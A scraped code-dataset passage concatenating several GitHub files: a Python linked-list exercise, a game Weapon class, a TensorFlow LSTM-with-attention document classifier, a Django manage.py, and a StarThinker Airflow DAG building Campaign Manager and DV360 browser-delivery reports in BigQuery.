prev_node.next=new_node
def printlist(self):
temp=self.head
while(temp):
print(temp.data)
temp=temp.next
l=linkedlist()
for i in range(5):
i=input()
l.push(i)
l.pushend(l.head.next,7)
l.printlist()
| [
"noreply@github.com"
] | tanurag2000.noreply@github.com |
3fd05c5ff2b6a3c8ce35d7290562accc3dc89df1 | 3d3a319af377fbac0e3a67c09ca2dc363ea82ac0 | /weapon.py | ce3746a14bfef4bf963b0dbd1a69889e1ef38db4 | [] | no_license | ken12321/room-algorithm | e0d5848c8a6d0574a25bd6f1e8b3b0bfae35ac27 | a9854363995767802b809ff380e1f3e827d04c02 | refs/heads/main | 2023-07-09T16:45:15.965272 | 2021-08-11T04:50:08 | 2021-08-11T04:50:08 | 380,092,287 | 0 | 0 | null | 2021-08-05T07:54:00 | 2021-06-25T01:29:52 | Python | UTF-8 | Python | false | false | 183 | py | import constants
class Weapon:
def __init__(self, name, description, damage):
self.name = name
self.description = description
self.damage = damage
| [
"ken.l.h23@gmail.com"
] | ken.l.h23@gmail.com |
f2586b39d392483dff52b21fbeceeb9f9ad54cf6 | e3aad9a7978f361bdd22706b34f587d885cda2a6 | /modules/rnn_classifier.py | 5d856db8bb4ec023182ad89bbd7f4199b85e85c9 | [] | no_license | ufukcbicici/WebPageCategorization | 1c8e27c7807bc50208736a1c40900b9fb749f8da | 30355cf5680c20d5c94b4770103cb67012581f98 | refs/heads/master | 2022-11-15T15:49:17.445369 | 2020-07-07T21:18:21 | 2020-07-07T21:18:21 | 277,296,662 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,122 | py | import tensorflow as tf
import os
import pathlib
import numpy as np
import pickle
from sklearn.metrics import classification_report
from collections import Counter
# from auxillary.db_logger import DbLogger
# from global_constants import GlobalConstants, DatasetType
# from model.deep_classifier import DeepClassifier
from modules.constants import GlobalConstants
from modules.db_logger import DbLogger
from modules.deep_classifier import DeepClassifier
class RnnClassifier(DeepClassifier):
def __init__(self, corpus, classifier_name):
super().__init__(corpus, classifier_name)
self.initial_state = None
self.initial_state_fw = None
self.initial_state_bw = None
self.finalLstmState = None
self.outputs = None
self.attentionMechanismInput = None
self.contextVector = None
self.alpha = None
self.finalState = None
self.temps = []
def get_embeddings(self):
super().get_embeddings()
# FC Layers
self.inputs = tf.layers.dense(self.inputs, GlobalConstants.DENSE_INPUT_DIMENSION, activation=tf.nn.relu)
if GlobalConstants.USE_INPUT_DROPOUT:
self.inputs = tf.nn.dropout(self.inputs, keep_prob=self.keep_prob)
@staticmethod
def get_stacked_lstm_cells(hidden_dimension, num_layers):
cell_list = [tf.contrib.rnn.LSTMCell(hidden_dimension,
forget_bias=1.0,
state_is_tuple=True) for _ in range(num_layers)]
cell = tf.contrib.rnn.MultiRNNCell(cell_list, state_is_tuple=True)
return cell
def get_classifier_structure(self):
num_layers = GlobalConstants.NUM_OF_LSTM_LAYERS
if not GlobalConstants.USE_BIDIRECTIONAL_LSTM:
cell = RnnClassifier.get_stacked_lstm_cells(hidden_dimension=GlobalConstants.LSTM_HIDDEN_LAYER_SIZE,
num_layers=num_layers)
# Add dropout to cell output
cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=self.keep_prob)
self.initial_state = cell.zero_state(self.batch_size, dtype=tf.float32)
# Dynamic LSTM
with tf.variable_scope('LSTM'):
self.outputs, state = tf.nn.dynamic_rnn(cell,
inputs=self.inputs,
initial_state=self.initial_state,
sequence_length=self.sequence_length)
final_state = state
self.finalLstmState = final_state[num_layers - 1].h
else:
cell_fw = RnnClassifier.get_stacked_lstm_cells(hidden_dimension=GlobalConstants.LSTM_HIDDEN_LAYER_SIZE,
num_layers=num_layers)
cell_bw = RnnClassifier.get_stacked_lstm_cells(hidden_dimension=GlobalConstants.LSTM_HIDDEN_LAYER_SIZE,
num_layers=num_layers)
# Add dropout to cell output
cell_fw = tf.contrib.rnn.DropoutWrapper(cell_fw, output_keep_prob=self.keep_prob)
cell_bw = tf.contrib.rnn.DropoutWrapper(cell_bw, output_keep_prob=self.keep_prob)
# Init states
self.initial_state_fw = cell_fw.zero_state(self.batch_size, dtype=tf.float32)
self.initial_state_bw = cell_bw.zero_state(self.batch_size, dtype=tf.float32)
# Dynamic Bi-LSTM
with tf.variable_scope('Bi-LSTM'):
self.outputs, state = tf.nn.bidirectional_dynamic_rnn(cell_fw,
cell_bw,
inputs=self.inputs,
initial_state_fw=self.initial_state_fw,
initial_state_bw=self.initial_state_bw,
sequence_length=self.sequence_length)
final_state_fw = state[0][num_layers - 1]
final_state_bw = state[1][num_layers - 1]
self.finalLstmState = tf.concat([final_state_fw.h, final_state_bw.h], 1)
if GlobalConstants.USE_ATTENTION_MECHANISM:
self.add_attention_mechanism()
else:
self.finalState = self.finalLstmState
def add_attention_mechanism(self):
if GlobalConstants.USE_BIDIRECTIONAL_LSTM:
forward_rnn_outputs = self.outputs[0]
backward_rnn_outputs = self.outputs[1]
self.attentionMechanismInput = tf.concat([forward_rnn_outputs, backward_rnn_outputs], axis=2)
else:
self.attentionMechanismInput = self.outputs
with tf.variable_scope('Attention-Model'):
hidden_state_length = self.attentionMechanismInput.get_shape().as_list()[-1]
self.contextVector = tf.Variable(name="context_vector",
initial_value=tf.random_normal([hidden_state_length], stddev=0.1))
w = self.contextVector
H = self.attentionMechanismInput
M = tf.tanh(H)
M = tf.reshape(M, [-1, hidden_state_length])
w = tf.reshape(w, [-1, 1])
pre_softmax = tf.reshape(tf.matmul(M, w), [-1, self.max_sequence_length])
zero_mask = tf.equal(pre_softmax, 0.0)
replacement_tensor = tf.fill([self.batch_size, self.max_sequence_length], -1e100)
masked_pre_softmax = tf.where(zero_mask, replacement_tensor, pre_softmax)
self.alpha = tf.nn.softmax(masked_pre_softmax)
r = tf.matmul(tf.transpose(H, [0, 2, 1]),
tf.reshape(self.alpha, [-1, self.max_sequence_length, 1]))
# r = tf.squeeze(r)
r = r[:, :, 0]
h_star = tf.tanh(r)
h_drop = tf.nn.dropout(h_star, self.keep_prob)
self.finalState = h_drop
self.temps.append(pre_softmax)
self.temps.append(zero_mask)
self.temps.append(masked_pre_softmax)
def get_softmax_layer(self):
hidden_layer_size = GlobalConstants.LSTM_HIDDEN_LAYER_SIZE
num_of_classes = self.corpus.get_num_of_classes()
# Softmax output layer
with tf.name_scope('softmax'):
if not GlobalConstants.USE_BIDIRECTIONAL_LSTM:
softmax_w = tf.get_variable('softmax_w', shape=[hidden_layer_size, num_of_classes], dtype=tf.float32)
elif GlobalConstants.USE_BIDIRECTIONAL_LSTM:
softmax_w = tf.get_variable('softmax_w', shape=[2 * hidden_layer_size, num_of_classes],
dtype=tf.float32)
else:
raise NotImplementedError()
softmax_b = tf.get_variable('softmax_b', shape=[num_of_classes], dtype=tf.float32)
# self.l2_loss += tf.nn.l2_loss(softmax_w)
# self.l2_loss += tf.nn.l2_loss(softmax_b)
self.logits = tf.matmul(self.finalState, softmax_w) + softmax_b
self.posteriors = tf.nn.softmax(self.logits)
self.predictions = tf.argmax(self.posteriors, 1, name='posteriors')
def train(self, **kwargs):
target_category = kwargs["target_category"]
sess = kwargs["session"]
run_id = DbLogger.get_run_id()
explanation = RnnClassifier.get_explanation()
DbLogger.write_into_table(rows=[(run_id, explanation)], table=DbLogger.runMetaData, col_count=2)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
file_path = pathlib.Path(__file__).parent.absolute()
model_folder = os.path.join(file_path, "..", "models", target_category)
if not os.path.exists(model_folder):
os.makedirs(model_folder)
losses = []
for iteration in range(GlobalConstants.ITERATION_COUNT):
sequences_arr, seq_lengths, labels_arr = self.corpus.get_training_batch(target_category=target_category)
feed_dict = {self.batch_size: sequences_arr.shape[0],
self.input_x: sequences_arr,
self.input_y: labels_arr,
self.keep_prob: GlobalConstants.DROPOUT_KEEP_PROB,
self.sequence_length: seq_lengths,
self.max_sequence_length: GlobalConstants.MAX_SEQUENCE_LENGTH}
run_ops = [self.optimizer, self.mainLoss]
results = sess.run(run_ops, feed_dict=feed_dict)
losses.append(results[1])
iteration += 1
if iteration % 10 == 0:
avg_loss = np.mean(np.array(losses))
losses = []
print("Iteration:{0} Avg Loss:{1}".format(iteration, avg_loss))
if iteration % 100 == 0:
checkpoint_folder = os.path.join(model_folder, "lstm{0}_iteration{1}".format(run_id, iteration))
path = os.path.join(checkpoint_folder, "lstm{0}_iteration{1}.ckpt".format(run_id, iteration))
saver.save(sess, path)
def test(self, **kwargs):
target_category = kwargs["target_category"]
batch_size = kwargs["batch_size"]
data_type = kwargs["data_type"]
sess = kwargs["session"]
file_path = pathlib.Path(__file__).parent.absolute()
model_folder = os.path.join(file_path, "..", "models")
all_posteriors = []
all_ground_truths = []
doc_id = 0
for sequences_arr, seq_lengths, labels_arr in \
self.corpus.get_document_sequences(target_category=target_category, data_type=data_type):
batch_id = 0
doc_ground_truths = []
doc_posteriors = []
while batch_id < sequences_arr.shape[0]:
seq_batch = sequences_arr[batch_id:batch_id + batch_size]
feed_dict = {self.batch_size: seq_batch.shape[0],
self.input_x: seq_batch,
self.keep_prob: GlobalConstants.DROPOUT_KEEP_PROB,
self.sequence_length: seq_lengths[batch_id:batch_id + batch_size],
self.max_sequence_length: GlobalConstants.MAX_SEQUENCE_LENGTH}
run_ops = [self.posteriors]
results = sess.run(run_ops, feed_dict=feed_dict)
doc_ground_truths.append(labels_arr[batch_id:batch_id + batch_size])
doc_posteriors.append(results[0])
batch_id += batch_size
assert len(doc_posteriors) == len(doc_ground_truths)
if len(doc_posteriors) == 0:
continue
all_posteriors.append(np.concatenate(doc_posteriors, axis=0))
all_ground_truths.append(np.concatenate(doc_ground_truths, axis=0))
print("\rProcessing document:{0}".format(doc_id), end="")
doc_id += 1
if doc_id % 1000 == 0:
assert len(all_posteriors) == len(all_ground_truths)
y = np.concatenate(all_ground_truths)
y_hat = np.argmax(np.concatenate(all_posteriors, axis=0), axis=1)
report = classification_report(y_true=y, y_pred=y_hat, target_names=["Other", target_category])
print(report)
model_file = open(os.path.join(model_folder, "{0}_ground_truths.sav".format(data_type)), "wb")
pickle.dump(all_ground_truths, model_file)
model_file.close()
model_file = open(os.path.join(model_folder, "{0}_posteriors.sav".format(data_type)), "wb")
pickle.dump(all_posteriors, model_file)
model_file.close()
def analyze_documents(self, sess, documents, batch_size):
all_posteriors = []
for sequences_arr, seq_lengths, labels_arr in \
self.corpus.get_document_sequences(target_category=None, data_type=None, outside_documents=documents):
batch_id = 0
doc_posteriors = []
while batch_id < sequences_arr.shape[0]:
seq_batch = sequences_arr[batch_id:batch_id + batch_size]
feed_dict = {self.batch_size: seq_batch.shape[0],
self.input_x: seq_batch,
self.keep_prob: GlobalConstants.DROPOUT_KEEP_PROB,
self.sequence_length: seq_lengths[batch_id:batch_id + batch_size],
self.max_sequence_length: GlobalConstants.MAX_SEQUENCE_LENGTH}
run_ops = [self.posteriors]
results = sess.run(run_ops, feed_dict=feed_dict)
doc_posteriors.append(results[0])
batch_id += batch_size
if len(doc_posteriors) == 0:
continue
all_posteriors.append(np.concatenate(doc_posteriors, axis=0))
return all_posteriors
| [
"ufukcbicici@yahoo.com"
] | ufukcbicici@yahoo.com |
ae6dccb3f41dacf3ab006321ca502a67ca354237 | 15ab83191e9aeb58433d578582d8c24ecd68bbaf | /backend/manage.py | 7ecd4a62b90eeb57c918b2b0eab5d8f0c9e39ac1 | [] | no_license | crowdbotics-apps/ecommerce-27317 | 6b36638113b5e64c537ef3e1e674132dd4c21bae | 1f2e00366e112aa3acf74362fba31af42c5589c1 | refs/heads/master | 2023-05-01T22:50:02.897152 | 2021-05-24T11:58:30 | 2021-05-24T11:58:30 | 370,334,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommerce_27317.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
6ce0ce9329100d7ed43836b2f9739fe6cd516d45 | 8ae7e5f4805c7333f087d193725c87bee16efd2f | /dags/itp_dag.py | d5975edc9aab580ce625de161f7e8fa9dcc74638 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | hernanperalta/starthinker | 816b59f65db0d907db84ccad499a89871ecdb385 | 89d50bc56e1d2b05003c644aa07fdf697c6e9fad | refs/heads/master | 2022-10-12T07:03:11.812525 | 2020-06-02T16:18:34 | 2020-06-02T16:18:34 | 267,911,855 | 0 | 0 | Apache-2.0 | 2020-05-29T17:04:04 | 2020-05-29T17:04:03 | null | UTF-8 | Python | false | false | 27,785 | py | ###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
--------------------------------------------------------------
Before running this Airflow module...
Install StarThinker in cloud composer from open source:
pip install git+https://github.com/google/starthinker
Or push local code to the cloud composer plugins directory:
source install/deploy.sh
4) Composer Menu
l) Install All
--------------------------------------------------------------
Browser Activity Dashboard ( 2019 )
Visualizes a client's Campaign Manager and DV360 activity by browser and device
Wait for <b>BigQuery->StarThinker Data->UNDEFINED->*</b> to be created.
Join the <a hre='https://groups.google.com/d/forum/starthinker-assets' target='_blank'>StarThinker Assets Group</a> to access the following assets
For each of the following copy and connect to the new BigQuery sources above. See <a href='https://docs.google.com/document/d/11NlVWzbw6UeSUVUeNuERZGU9FYySWcRbu2Fg6zJ4O-A/edit?usp=sharing' target='_blank'>detailed instructions</a>.
Copy <a href='https://datastudio.google.com/open/1lxRWIs3ozzWs4-9WTy3EcqMcrtYn-7nI' target='_blank'>Combined_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1CeOHxxo-yAAMWcjI1ALsu_Dv-u2W78Rk' target='_blank'>DV360_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1NlN8rel--3t9VtTuA_0y2c6dcmIYog5g' target='_blank'>CM_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1-mGW74gnWu8zKejBhfLvmgro5rlpVNkE' target='_blank'>Floodlight_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1ftGTV0jaHKwGemhSgKOcoesuWzf4Jcwd' target='_blank'>Browser Delivery Report</a>.
When prompted choose the new data sources you just created.
Or give these intructions to the client.
'''
from starthinker_airflow.factory import DAG_Factory
# Add the following credentials to your Airflow configuration.
USER_CONN_ID = "starthinker_user" # The connection to use for user authentication.
GCP_CONN_ID = "starthinker_service" # The connection to use for service authentication.
INPUTS = {
'dataset': '', # Place where tables will be written in BigQuery.
'recipe_timezone': 'America/Los_Angeles', # Timezone for report dates.
'dcm_account': '', # CM account id of client.
'dcm_advertisers': [], # Comma delimited list of CM advertiser ids.
'dcm_floodlight': '', # CM floodlight configuration id.
'dbm_partners': [], # DV360 partner id.
'dbm_advertisers': [], # Comma delimited list of DV360 advertiser ids.
}
TASKS = [
{
'dataset': {
'auth': 'service',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'Report suffix and BigQuery dataset to contain data.'
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'filters': {
'dfa:advertiser': {
'values': {
'field': {
'name': 'dcm_advertisers',
'kind': 'integer_list',
'order': 3,
'default': [
],
'description': 'Comma delimited list of CM advertiser ids.'
}
}
}
},
'body': {
'type': 'STANDARD',
'format': 'CSV',
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Delivery_',
'description': 'Report in CM, should be unique.'
}
},
'accountId': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'criteria': {
'dateRange': {
'relativeDateRange': 'LAST_365_DAYS'
},
'dimensions': [
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiser'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiserId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaign'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaignId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:site'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:browserPlatform'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:platformType'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:date'
}
],
'metricNames': [
'dfa:impressions',
'dfa:clicks',
'dfa:activityViewThroughConversions',
'dfa:activityClickThroughConversions'
]
}
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Delivery_',
'description': 'Report in CM, should be unique.'
}
}
},
'out': {
'bigquery': {
'table': 'CM_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'body': {
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Floodlight_',
'description': 'Report in CM, should be unique.'
}
},
'type': 'FLOODLIGHT',
'format': 'CSV',
'accountId': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'floodlightCriteria': {
'dateRange': {
'relativeDateRange': 'LAST_60_DAYS'
},
'dimensions': [
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiser'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiserId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaign'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaignId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:date'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:browserPlatform'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:platformType'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:activity'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:activityId'
}
],
'floodlightConfigId': {
'dimensionName': 'dfa:floodlightConfigId',
'kind': 'dfareporting#dimensionValue',
'matchType': 'EXACT',
'value': {
'field': {
'name': 'dcm_floodlight',
'kind': 'integer',
'order': 4,
'default': '',
'description': 'CM floodlight configuration id.'
}
}
},
'metricNames': [
'dfa:activityClickThroughConversions',
'dfa:activityViewThroughConversions',
'dfa:totalConversions'
],
'reportProperties': {
'includeUnattributedCookieConversions': True,
'includeUnattributedIPConversions': False
}
}
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Floodlight_',
'description': 'Report in CM, should be unique.'
}
}
},
'out': {
'bigquery': {
'table': 'CM_Browser_Floodlight',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
}
}
}
},
{
'dbm': {
'auth': 'user',
'report': {
'filters': {
'FILTER_PARTNER': {
'values': {
'field': {
'name': 'dbm_partners',
'kind': 'integer_list',
'order': 5,
'default': [
],
'description': 'DV360 partner id.'
}
}
},
'FILTER_ADVERTISER': {
'values': {
'field': {
'name': 'dbm_advertisers',
'kind': 'integer_list',
'order': 6,
'default': [
],
'description': 'Comma delimited list of DV360 advertiser ids.'
}
}
}
},
'body': {
'timezoneCode': {
'field': {
'name': 'recipe_timezone',
'kind': 'timezone',
'description': 'Timezone for report dates.',
'default': 'America/Los_Angeles'
}
},
'metadata': {
'title': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'DV360_Browser_Delivery_',
'description': 'Name of report in DV360, should be unique.'
}
},
'dataRange': 'LAST_365_DAYS',
'format': 'CSV'
},
'params': {
'type': 'TYPE_GENERAL',
'groupBys': [
'FILTER_ADVERTISER',
'FILTER_BROWSER',
'FILTER_MEDIA_PLAN',
'FILTER_DATE',
'FILTER_DEVICE_TYPE',
'FILTER_INSERTION_ORDER',
'FILTER_PAGE_LAYOUT'
],
'metrics': [
'METRIC_IMPRESSIONS',
'METRIC_CLICKS',
'METRIC_LAST_CLICKS',
'METRIC_LAST_IMPRESSIONS',
'METRIC_REVENUE_ADVERTISER',
'METRIC_MEDIA_COST_ADVERTISER'
]
}
}
}
}
},
{
'dbm': {
'auth': 'user',
'report': {
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'DV360_Browser_Delivery_',
'description': 'DV360 report name, should be unique.'
}
}
},
'out': {
'bigquery': {
'table': 'DV360_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
},
'schema': [
{
'name': 'Advertiser',
'type': 'STRING'
},
{
'name': 'Advertiser_ID',
'type': 'INTEGER'
},
{
'name': 'Advertiser_Status',
'type': 'STRING'
},
{
'name': 'Advertiser_Integration_Code',
'type': 'STRING'
},
{
'name': 'Browser',
'type': 'STRING'
},
{
'name': 'Campaign',
'type': 'STRING'
},
{
'name': 'Campaign_ID',
'type': 'INTEGER'
},
{
'name': 'Report_Day',
'type': 'DATE'
},
{
'name': 'Device_Type',
'type': 'STRING'
},
{
'name': 'Insertion_Order',
'type': 'STRING'
},
{
'name': 'Insertion_Order_ID',
'type': 'INTEGER'
},
{
'name': 'Insertion_Order_Status',
'type': 'STRING'
},
{
'name': 'Insertion_Order_Integration_Code',
'type': 'STRING'
},
{
'name': 'Environment',
'type': 'STRING'
},
{
'name': 'Advertiser_Currency',
'type': 'STRING'
},
{
'name': 'Impressions',
'type': 'INTEGER'
},
{
'name': 'Clicks',
'type': 'INTEGER'
},
{
'name': 'Post_Click_Conversions',
'type': 'FLOAT'
},
{
'name': 'Post_View_Conversions',
'type': 'FLOAT'
},
{
'name': 'Revenue_Adv_Currency',
'type': 'FLOAT'
},
{
'name': 'Media_Cost_Advertiser_Currency',
'type': 'FLOAT'
}
]
}
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'Floodlight_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH\r\nbrowser_clean AS (\r\n SELECT\r\n Advertiser,\r\n Advertiser_Id,\r\n Campaign,\r\n Campaign_Id,\r\n Browser_Platform,\r\n Activity,\r\n Activity_ID,\r\n CASE\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Chrome).*") THEN "Chrome" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Firefox).*") THEN "Firefox" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Safari).*") THEN "Safari"\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPhone).*") THEN "Safari" \r\n ELSE "Other"\r\n END AS Clean_Browser,\r\n Platform_Type,\r\n Report_Day,\r\n View_Through_Conversions,\r\n Click_Through_Conversions,\r\n Total_Conversions\r\n FROM [PARAMETER].CM_Browser_Floodlight\r\n)\r\n\r\n SELECT\r\n *,\r\n CASE WHEN Platform_Type="Mobile highend: smartphone" OR Platform_Type="Mobile midrange: feature phone" OR Platform_Type="Tablet" THEN Total_Conversions ELSE 0 END AS Mobile_Convs,\r\n CASE WHEN Platform_Type="Desktop" THEN Total_Conversions ELSE 0 END AS Desktop_Convs,\r\n CASE WHEN Clean_Browser="Chrome" THEN Total_Conversions ELSE 0 END AS Chrome_Convs,\r\n CASE WHEN Clean_Browser="Safari" THEN Total_Conversions ELSE 0 END AS Safari_Convs,\r\n CASE WHEN Clean_Browser="Firefox" THEN Total_Conversions ELSE 0 END AS Firefox_Convs\r\n FROM browser_clean',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Bigquery container for data.'
}
}
]
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'CM_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH\r\nbrowser_clean AS (\r\n SELECT\r\n Advertiser,\r\n Advertiser_Id,\r\n Campaign,\r\n Campaign_Id,\r\n Site_Dcm,\r\n Browser_Platform,\r\n CASE\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Chrome).*") THEN "Chrome" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Firefox).*") THEN "Firefox" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*Safari).*") THEN "Safari"\r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPad).*") THEN "Safari" \r\n WHEN REGEXP_CONTAINS(Browser_Platform, "((?i).*iPhone).*") THEN "Safari" \r\n ELSE "Other"\r\n END AS Clean_Browser,\r\n Platform_Type,\r\n Report_Day,\r\n Impressions,\r\n Clicks,\r\n View_Through_Conversions,\r\n Click_Through_Conversions\r\n FROM [PARAMETER].CM_Browser_Delivery\r\n)\r\n\r\n SELECT\r\n *,\r\n CASE WHEN Platform_Type="Mobile highend: smartphone" OR Platform_Type="Mobile midrange: feature phone" OR Platform_Type="Tablet" THEN Impressions ELSE 0 END AS Mobile_Imps,\r\n CASE WHEN Platform_Type="Desktop" THEN Impressions ELSE 0 END AS Desktop_Imps,\r\n CASE WHEN Platform_Type="Connected TV" THEN Impressions ELSE 0 END AS CTV_Imps,\r\n CASE WHEN Clean_Browser="Chrome" THEN Impressions ELSE 0 END AS Chrome_Imps,\r\n CASE WHEN Clean_Browser="Safari" THEN Impressions ELSE 0 END AS Safari_Imps,\r\n CASE WHEN Clean_Browser="Firefox" THEN Impressions ELSE 0 END AS Firefox_Imps\r\n FROM browser_clean',
'legacy': False,
'parameters': [
{
'field': {
'name': 'dataset',
'kind': 'string',
'description': 'Bigquery container for data.'
}
}
]
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'DV360_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
'query': 'WITH\r\nbrowser_cleaned AS (\r\n SELECT \r\n Advertiser,\r\n Advertiser_Id,\r\n Advertiser_Currency,\r\n Browser,\r\n Campaign,\r\n Campaign_Id,\r\n Insertion_Order, \r\n Insertion_Order_Id,\r\n Report_Day,\r\n Device_Type,\r\n Environment,\r\n Impressions,\r\n Clicks,\r\n Post_Click_Conversions,\r\n Post_View_Conversions,\r\n Revenue_Adv_Currency as Revenue,\r\n Media_Cost_Advertiser_Currency,\r\n CASE\r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Chrome).*") THEN "Chrome" \r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Firefox).*") THEN "Firefox" \r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Safari).*") THEN "Safari"\r\n ELSE "Other"\r\n END AS Clean_Browser,\r\n CASE \r\n WHEN Browser="Safari 12" THEN "Safari 12"\r\n WHEN Browser="Safari 11" THEN "Safari 11"\r\n WHEN REGEXP_CONTAINS(Browser, "((?i).*Safari).*") AND Browser!="Safari 12" AND Browser!="Safari 11" THEN "Safari 10 & Below"\r\n ELSE "Non Safari"\r\n END AS ITP_Affected_Browsers\r\n FROM [PARAMETER].DV360_Browser_Delivery \r\n)\r\n\r\n SELECT\r\n *,\r\n CASE WHEN Device_Type="Smart Phone" OR Device_Type="Tablet" THEN Impressions ELSE 0 END AS Mobile_Imps,\r\n CASE WHEN Device_Type="Desktop" THEN Impressions ELSE 0 END AS Desktop_Imps,\r\n CASE WHEN Device_Type="Connected TV" THEN Impressions ELSE 0 END AS CTV_Imps,\r\n CASE WHEN Clean_Browser="Chrome" THEN Impressions ELSE 0 END AS Chrome_Imps,\r\n CASE WHEN Clean_Browser="Safari" THEN Impressions ELSE 0 END AS Safari_Imps,\r\n CASE WHEN Clean_Browser="Firefox" THEN Impressions ELSE 0 END AS Firefox_Imps,\r\n CASE WHEN Clean_Browser="Chrome" THEN Revenue ELSE 0 END AS Chrome_Rev,\r\n CASE WHEN Clean_Browser="Safari" THEN Revenue ELSE 0 END AS Safari_Rev,\r\n CASE WHEN Clean_Browser="Firefox" THEN 